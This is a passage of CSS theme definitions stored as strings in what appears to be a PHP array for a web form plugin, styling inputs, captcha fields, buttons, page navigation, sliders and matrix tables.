select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_select select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input \n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.time_box\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.time_box:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.am_pm_select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#CFC1C1 !important;\nbackground-color:#ffffff !important;\nfont-style:italic !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#000 !important;\nheight:18px !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.captcha_input:focus\n{\ncolor:#000000 !important;\nheight:18px !important;\nbackground-color:#FFDDC4 !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}   \n.page_deactive\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_active\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_percentage_active \n{\npadding: 0px !important;\nmargin: 0px !important;\nborder-spacing: 0px !important;\nheight: 10px !important;\nline-height: 10px !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder-radius: 0px !important;\nfont-size: 15px !important;\nfloat: left !important;\ntext-align: right !important;\n}\n.page_percentage_deactive {\nheight: 10px !important;\nline-height: 9px !important;\nborder: 1px solid #000 !important;\nbackground-color:#F4801D !important;\ntext-align: left !important;\npadding: 2px !important;\nborder-radius: 0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.other_input\n{\ncolor:#ffffff !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nmargin-left: 25px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.other_input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#fff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom: 5px !important;\nbackground-color:#F06E00 !important;\nline-height: 35px !important;\n}\n.wdform_percentage_text\n{\nmargin:0px -30px 0px 0px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\nfont-size: 13px !important;\n}\n.wdform_percentage_title\n{\nfont-family:''Times New Roman'', Times, serif !important;\ncolor:#fff !important;\nfont-style:italic !important;\nline-height:9px !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #ffffff !important;\nborder-radius:1px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor: white;\r\nbackground-color: #E96711;\r\nborder: 1px solid #FF8F00;\r\npadding:0 4px;\r\n}\r\n\r\n.wdform_grading input:focus\r\n{\r\ncolor: #000000;\r\nbackground-color: #FFDDC4;\r\nborder: 1px solid #FF8F00;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#E96711 !important;\r\nborder:1px solid #FF8F00;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#E96711;\r\nborder:1px solid #FF8F00;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #FF8F00;\r\nborder-radius:0px;\r\nbackground:none;\r\n}\r\n\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#E96711;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#E96711;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #FF8F00;\r\nmargin-right:3px !important;\r\nborder-radius:0px;\r\nbackground: #E96711;\r\n}\r\n\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #FF8F00;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\nbackground: #FFDDC4;\r\ncolor:#000000;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#FFFFFF;\r\nbackground-color:#E96711;\r\nmargin:5px 7px;\r\nborder:1px solid #FF8F00;\r\npadding:1px;\r\n}\r\n\r\n.wdform_matrix table input:focus, .wdform_matrix table select:focus\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFDDC4;\r\nborder:1px solid #FF8F00;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "20" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:left;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important;\n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	background-image:inherit !important;\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 6px solid #fff !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:transparent !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\nborder:1px solid #4AB9F1 !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#4AB9F1 !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #999 !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\n}\n.wdform_colon\n{\ncolor:#000\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#999 !important;\nfont-style:italic !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: transparent !important;\n}\n.input_active\n{\ncolor:#000 !important;\nfont-style:normal !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: transparent !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\ncolor:#000 !important;\nborder: 1px solid #999 !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: transparent !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#000 !important;\n}    \n.page_deactive\n{\ncolor:#000 !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:transparent !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#fff !important;\nborder:1px solid #999 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#fff !important;\nbackground-color:#5EA3CC !important;\nborder-radius: 0px !important;\nbox-shadow: 0px 0px 5px 2px transparent !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#5EA3CC !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:transparent !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#000 !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\nspan.wdform_page_button\n{\ncolor:#5EA3CC !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: transparent !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#999!important;\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#999;\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#999;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #999;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #999;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground-color:#FFFFFF;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #999;\r\n\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#000000;\r\nbackground-color:transparent;\r\nmargin: 2px 5px 3px 0 !important;\r\nborder:1px solid #000000;\r\npadding:1px;\r\n}",
      "21" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:left;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	background-image:inherit !important;\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#000000 !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#C2C2C2 !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff 